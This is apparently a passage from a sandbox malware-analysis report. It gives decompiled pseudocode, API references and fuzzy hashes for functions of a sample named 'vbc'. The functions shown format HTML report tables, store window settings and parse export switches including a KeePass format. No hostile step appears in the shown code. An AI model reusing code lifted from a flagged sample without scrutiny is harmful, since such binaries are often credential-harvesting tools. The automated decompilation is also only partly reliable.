					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                                                                                                    0x0040f126
                                                                                                                                                    0x0040f141
                                                                                                                                                    0x0040f147
                                                                                                                                                    0x0040f155
                                                                                                                                                    0x0040f15b
                                                                                                                                                    0x0040f160
                                                                                                                                                    0x0040f167
                                                                                                                                                    0x0040f16e
                                                                                                                                                    0x0040f175
                                                                                                                                                    0x0040f175
                                                                                                                                                    0x0040f17b
                                                                                                                                                    0x0040f17e
                                                                                                                                                    0x0040f180
                                                                                                                                                    0x0040f188
                                                                                                                                                    0x0040f18d
                                                                                                                                                    0x0040f194
                                                                                                                                                    0x0040f1a3
                                                                                                                                                    0x0040f1b0
                                                                                                                                                    0x0040f1b5
                                                                                                                                                    0x0040f1b5
                                                                                                                                                    0x0040f1b8
                                                                                                                                                    0x0040f1be
                                                                                                                                                    0x0040f1da
                                                                                                                                                    0x0040f1e7
                                                                                                                                                    0x0040f1ec
                                                                                                                                                    0x0040f1f5
                                                                                                                                                    0x0040f1fb
                                                                                                                                                    0x0040f1ff
                                                                                                                                                    0x0040f207
                                                                                                                                                    0x0040f20d
                                                                                                                                                    0x0040f212
                                                                                                                                                    0x0040f21c
                                                                                                                                                    0x0040f224
                                                                                                                                                    0x0040f22a
                                                                                                                                                    0x0040f22e
                                                                                                                                                    0x0040f236
                                                                                                                                                    0x0040f23c
                                                                                                                                                    0x0040f242

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F147
                                                                                                                                                    • memset.MSVCRT ref: 0040F15B
                                                                                                                                                    • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                                                                                    • sprintf.MSVCRT ref: 0040F1A3
                                                                                                                                                    • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                                                                                    • sprintf.MSVCRT ref: 0040F1DA
                                                                                                                                                    • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                                                                                    • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                                                                                    • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                                                                                    • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                                                                                    • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                                                                                    • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcat$memsetsprintf$strcpy
                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                    • API String ID: 1662040868-1996832678
                                                                                                                                                    • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                                                                    • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                                                                                    • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                                                                    • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AF17 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040AF17(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x413bdc;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t83 =  &_v540;
				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401896(_t75);
				}
				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
			}



















                                                                                                                                                    0x0040af29
                                                                                                                                                    0x0040af35
                                                                                                                                                    0x0040af3c
                                                                                                                                                    0x0040af4d
                                                                                                                                                    0x0040af5c
                                                                                                                                                    0x0040af65
                                                                                                                                                    0x0040af67
                                                                                                                                                    0x0040af67
                                                                                                                                                    0x0040af76
                                                                                                                                                    0x0040af7e
                                                                                                                                                    0x0040af92
                                                                                                                                                    0x0040af9c
                                                                                                                                                    0x0040afa3
                                                                                                                                                    0x0040afaa
                                                                                                                                                    0x0040afbb
                                                                                                                                                    0x0040afc0
                                                                                                                                                    0x0040afdf
                                                                                                                                                    0x0040aff8
                                                                                                                                                    0x0040b011
                                                                                                                                                    0x0040b02a
                                                                                                                                                    0x0040b02d
                                                                                                                                                    0x0040b037
                                                                                                                                                    0x0040b03a
                                                                                                                                                    0x0040b03b
                                                                                                                                                    0x0040b03d
                                                                                                                                                    0x0040b045
                                                                                                                                                    0x0040b047
                                                                                                                                                    0x0040b04f
                                                                                                                                                    0x0040b051
                                                                                                                                                    0x0040b051
                                                                                                                                                    0x0040b045
                                                                                                                                                    0x0040b06a
                                                                                                                                                    0x0040b070
                                                                                                                                                    0x0040b076
                                                                                                                                                    0x0040b078
                                                                                                                                                    0x0040b078
                                                                                                                                                    0x0040b092

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AF3C
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                                                                                    • strrchr.MSVCRT ref: 0040AF5C
                                                                                                                                                    • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                                                                                    • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                                                                    • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                    • API String ID: 1301239246-2014360536
                                                                                                                                                    • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                                                                                    • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                                                                                                                    • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                                                                                    • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409482 Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}































                                                                                                                                                    0x00409482
                                                                                                                                                    0x0040949b
                                                                                                                                                    0x004094a2
                                                                                                                                                    0x004094a9
                                                                                                                                                    0x004094b5
                                                                                                                                                    0x004094b7
                                                                                                                                                    0x004094ba
                                                                                                                                                    0x004094c1
                                                                                                                                                    0x004094c5
                                                                                                                                                    0x004094d4
                                                                                                                                                    0x004094db
                                                                                                                                                    0x004094e7
                                                                                                                                                    0x004094eb
                                                                                                                                                    0x004094f2
                                                                                                                                                    0x004094f7
                                                                                                                                                    0x00409503
                                                                                                                                                    0x00409506
                                                                                                                                                    0x0040951f
                                                                                                                                                    0x00409524
                                                                                                                                                    0x00409524
                                                                                                                                                    0x0040952f
                                                                                                                                                    0x00409539
                                                                                                                                                    0x0040953c
                                                                                                                                                    0x00409546
                                                                                                                                                    0x0040954c
                                                                                                                                                    0x0040955b
                                                                                                                                                    0x00409566
                                                                                                                                                    0x0040956c
                                                                                                                                                    0x0040956f
                                                                                                                                                    0x00409573
                                                                                                                                                    0x00409577
                                                                                                                                                    0x0040957f
                                                                                                                                                    0x00409582
                                                                                                                                                    0x0040958d
                                                                                                                                                    0x0040959a
                                                                                                                                                    0x004095ae
                                                                                                                                                    0x004095bc
                                                                                                                                                    0x004095c3
                                                                                                                                                    0x004095c6
                                                                                                                                                    0x004095cc
                                                                                                                                                    0x00409601
                                                                                                                                                    0x004095ce
                                                                                                                                                    0x004095d1
                                                                                                                                                    0x004095e4
                                                                                                                                                    0x004095ed
                                                                                                                                                    0x004095f2
                                                                                                                                                    0x004095f2
                                                                                                                                                    0x00409608
                                                                                                                                                    0x0040960b
                                                                                                                                                    0x0040960f
                                                                                                                                                    0x0040961c
                                                                                                                                                    0x00409622
                                                                                                                                                    0x0040962c
                                                                                                                                                    0x00409650
                                                                                                                                                    0x0040965b
                                                                                                                                                    0x00409660
                                                                                                                                                    0x00409663
                                                                                                                                                    0x0040966c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00409544
                                                                                                                                                    0x00409544
                                                                                                                                                    0x00409546
                                                                                                                                                    0x00409672
                                                                                                                                                    0x0040967a
                                                                                                                                                    0x00409692

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004094A2
                                                                                                                                                    • memset.MSVCRT ref: 004094C5
                                                                                                                                                    • memset.MSVCRT ref: 004094DB
                                                                                                                                                    • memset.MSVCRT ref: 004094EB
                                                                                                                                                    • sprintf.MSVCRT ref: 0040951F
                                                                                                                                                    • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                                                                                    • sprintf.MSVCRT ref: 004095ED
                                                                                                                                                    • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                                                                                      • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                                                                                    • sprintf.MSVCRT ref: 00409650
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                    • API String ID: 2822972341-601624466
                                                                                                                                                    • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                                                                    • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                                                                                    • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                                                                                    • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409EC4 Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                                                                                                    0x00409ec7
                                                                                                                                                    0x00409ed5
                                                                                                                                                    0x00409edf
                                                                                                                                                    0x00409ee5
                                                                                                                                                    0x00409ef1
                                                                                                                                                    0x00409ef6
                                                                                                                                                    0x00409efc
                                                                                                                                                    0x00409f11
                                                                                                                                                    0x00409f11
                                                                                                                                                    0x00409f1a
                                                                                                                                                    0x00409f26
                                                                                                                                                    0x00409f2b
                                                                                                                                                    0x00409f31
                                                                                                                                                    0x00409f46
                                                                                                                                                    0x00409f46
                                                                                                                                                    0x00409f52
                                                                                                                                                    0x00409f57
                                                                                                                                                    0x00409f5d
                                                                                                                                                    0x00409f93
                                                                                                                                                    0x00409f97
                                                                                                                                                    0x00409fa1
                                                                                                                                                    0x00409fa3
                                                                                                                                                    0x00409fa7
                                                                                                                                                    0x00409fb8
                                                                                                                                                    0x00409fc2
                                                                                                                                                    0x00409fcf
                                                                                                                                                    0x00409fdb
                                                                                                                                                    0x00409fde
                                                                                                                                                    0x0040a004

                                                                                                                                                    APIs
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                                                                                    • SendMessageA.USER32 ref: 00409F11
                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                                                                                    • SendMessageA.USER32 ref: 00409F46
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                                                                                    • LoadImageA.USER32 ref: 00409F7B
                                                                                                                                                    • LoadImageA.USER32 ref: 00409F97
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                                                                                    • SendMessageA.USER32 ref: 00409FFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3411798969-0
                                                                                                                                                    • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                                                                    • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                                                                                    • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                                                                                    • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B841 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                                                                                                    0x0040b842
                                                                                                                                                    0x0040b847
                                                                                                                                                    0x0040b850
                                                                                                                                                    0x0040b857
                                                                                                                                                    0x0040b85c
                                                                                                                                                    0x0040b865
                                                                                                                                                    0x0040b86c
                                                                                                                                                    0x0040b871
                                                                                                                                                    0x0040b87a
                                                                                                                                                    0x0040b881
                                                                                                                                                    0x0040b886
                                                                                                                                                    0x0040b88f
                                                                                                                                                    0x0040b896
                                                                                                                                                    0x0040b89b
                                                                                                                                                    0x0040b8a4
                                                                                                                                                    0x0040b8ab
                                                                                                                                                    0x0040b8b0
                                                                                                                                                    0x0040b8b9
                                                                                                                                                    0x0040b8c0
                                                                                                                                                    0x0040b8c5
                                                                                                                                                    0x0040b8cc
                                                                                                                                                    0x0040b8d6
                                                                                                                                                    0x0040b8bb
                                                                                                                                                    0x0040b8bd
                                                                                                                                                    0x0040b8be
                                                                                                                                                    0x0040b8be
                                                                                                                                                    0x0040b8a6
                                                                                                                                                    0x0040b8a8
                                                                                                                                                    0x0040b8a9
                                                                                                                                                    0x0040b8a9
                                                                                                                                                    0x0040b891
                                                                                                                                                    0x0040b893
                                                                                                                                                    0x0040b894
                                                                                                                                                    0x0040b894
                                                                                                                                                    0x0040b87c
                                                                                                                                                    0x0040b87e
                                                                                                                                                    0x0040b87f
                                                                                                                                                    0x0040b87f
                                                                                                                                                    0x0040b867
                                                                                                                                                    0x0040b869
                                                                                                                                                    0x0040b86a
                                                                                                                                                    0x0040b86a
                                                                                                                                                    0x0040b852
                                                                                                                                                    0x0040b854
                                                                                                                                                    0x0040b855
                                                                                                                                                    0x0040b855

                                                                                                                                                    APIs
                                                                                                                                                    • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                                                                                    • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp
                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                    • API String ID: 2884411883-1959339147
                                                                                                                                                    • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                                                                    • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                                                                                    • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                                                                                    • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F243 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
